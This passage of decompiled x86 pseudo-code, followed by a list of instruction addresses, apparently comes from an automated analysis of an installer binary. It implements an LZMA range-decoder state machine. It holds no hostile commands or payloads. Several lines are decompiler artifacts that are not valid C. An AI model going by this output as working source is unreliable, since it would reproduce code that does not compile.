                                                											L100:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t335 = __ebp - 0x70;
                                                											 *_t335 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t335;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L102;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L110:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t366 = __ebp - 0x70;
                                                											 *_t366 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t366;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L112;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											L132:
                                                											 *(_t612 - 0x54) = _t605;
                                                											goto L133;
                                                										case 0x12:
                                                											goto L0;
                                                										case 0x13:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												goto L144;
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											goto L130;
                                                										case 0x14:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											L140:
                                                											 *(_t612 - 0x88) = _t533;
                                                											goto L1;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L121;
                                                										case 0x16:
                                                											__eax =  *(__ebp - 0x30);
                                                											__eflags = __eax - 4;
                                                											if(__eax >= 4) {
                                                												_push(3);
                                                												_pop(__eax);
                                                											}
                                                											__ecx =  *(__ebp - 4);
                                                											 *(__ebp - 0x40) = 6;
                                                											__eax = __eax << 7;
                                                											 *(__ebp - 0x7c) = 0x19;
                                                											 *(__ebp - 0x58) = __eax;
                                                											goto L145;
                                                										case 0x17:
                                                											goto L145;
                                                										case 0x18:
                                                											L146:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x18;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t484 = __ebp - 0x70;
                                                											 *_t484 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t484;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L148:
                                                											_t487 = __ebp - 0x48;
                                                											 *_t487 =  *(__ebp - 0x48) - 1;
                                                											__eflags =  *_t487;
                                                											goto L149;
                                                										case 0x19:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L120:
                                                												_t394 = __ebp - 0x2c;
                                                												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t394;
                                                												L121:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t401 = __ebp - 0x60;
                                                												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t401;
                                                												goto L124;
                                                											}
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L103:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L109:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L113:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														_t392 = __ebp - 0x2c;
                                                														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t392;
                                                														goto L120;
                                                													}
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L112:
                                                														_t369 = __ebp - 0x48;
                                                														 *_t369 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t369;
                                                														goto L113;
                                                													} else {
                                                														goto L110;
                                                													}
                                                												}
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L102:
                                                													_t339 = __ebp - 0x48;
                                                													 *_t339 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t339;
                                                													goto L103;
                                                												} else {
                                                													goto L100;
                                                												}
                                                											}
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L109;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L80;
                                                										case 0x1b:
                                                											L76:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t275 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t275;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t284 = __ebp - 0x64;
                                                											 *_t284 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t284;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L80:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L81;
                                                										case 0x1c:
                                                											while(1) {
                                                												L124:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t415 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t415;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t415;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L81:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											L170:
                                                											_push(0x22);
                                                											_pop(_t567);
                                                											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                											_t535 = 0;
                                                											L172:
                                                											return _t535;
                                                									}
                                                								}
                                                								L171:
                                                								_t535 = _t534 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                						__eax =  *(__ebp - 0x50);
                                                						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                						__eax =  *(__ebp - 0x58);
                                                						__esi = __edx + __eax;
                                                						 *(__ebp - 0x54) = __esi;
                                                						__ax =  *__esi;
                                                						__edi = __ax & 0x0000ffff;
                                                						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                						if( *(__ebp - 0xc) >= __ecx) {
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                							__cx = __ax;
                                                							__cx = __ax >> 5;
                                                							__eax = __eax - __ecx;
                                                							__edx = __edx + 1;
                                                							 *__esi = __ax;
                                                							 *(__ebp - 0x50) = __edx;
                                                						} else {
                                                							 *(__ebp - 0x10) = __ecx;
                                                							0x800 = 0x800 - __edi;
                                                							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                							 *__esi = __cx;
                                                						}
                                                						if( *(__ebp - 0x10) >= 0x1000000) {
                                                							goto L148;
                                                						} else {
                                                							goto L146;
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}








                                                0x00000000
                                                0x00407234
                                                0x00407234
                                                0x00407238
                                                0x0040725d
                                                0x00407267
                                                0x00000000
                                                0x0040723a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407247
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00407328
                                                0x00407328
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00000000
                                                0x0040746e
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x00000000
                                                0x00406c8b
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
